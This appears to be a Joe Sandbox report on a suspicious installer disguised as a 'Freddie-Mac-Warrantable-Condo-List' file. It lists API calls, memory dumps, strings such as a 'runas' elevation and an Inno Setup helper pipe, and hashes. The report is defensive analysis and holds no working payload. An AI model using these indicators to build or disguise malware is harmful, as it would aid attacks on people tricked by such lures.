Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8

Uniqueness

Uniqueness Score: -1.00%

Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296

Uniqueness

Uniqueness Score: -1.00%

Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458

Uniqueness

Uniqueness Score: -1.00%

Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772

Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059

Uniqueness

Uniqueness Score: -1.00%

Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C

Uniqueness

Uniqueness Score: -1.00%

Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24

Uniqueness

Uniqueness Score: -1.00%

Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 004103B8

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB

Uniqueness

Uniqueness Score: -1.00%

Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
Opcode Fuzzy Hash: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88

Uniqueness

Uniqueness Score: -1.00%

Function 00405812, Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405843
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00405866
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00405873

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
Instruction ID: 84a00d9712422ee72978a24a1d80a8d623c3a2aa13178c9074bfc96ea9226af9
Opcode Fuzzy Hash: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
Instruction Fuzzy Hash: B8F08135704A009FD310EB2AC945B27B7E5EFC9750F19C17AE9889B3A0E635DC118B96

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006257BC
QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CreateProcessW.KERNEL32 ref: 00625986
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

CreateNamedPipe, xrefs: 0062586C
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00625824
SetNamedPipeHandleState, xrefs: 006258E6
Helper process PID: %u, xrefs: 006259D9
64-bit helper EXE wasn't extracted, xrefs: 006257B0
Cannot utilize 64-bit features on this version of Windows, xrefs: 0062579D
D, xrefs: 006258FF
CreateProcess, xrefs: 0062598F
i, xrefs: 00625939
helper %d 0x%x, xrefs: 00625965
Starting 64-bit helper process., xrefs: 00625789
CreateFile, xrefs: 006258B2

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65

Uniqueness

Uniqueness Score: -1.00%

Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91

Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043

ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
MsgWaitForMultipleObjects.USER32 ref: 006A61C5
GetExitCodeProcess.KERNEL32 ref: 006A61EB
CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F

Strings

MsgWaitForMultipleObjects, xrefs: 006A61D4
ShellExecuteEx returned hProcess=0, xrefs: 006A6199
<, xrefs: 006A612E
runas, xrefs: 006A613C
ShellExecuteEx, xrefs: 006A6189
GetExitCodeProcess, xrefs: 006A61F4

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

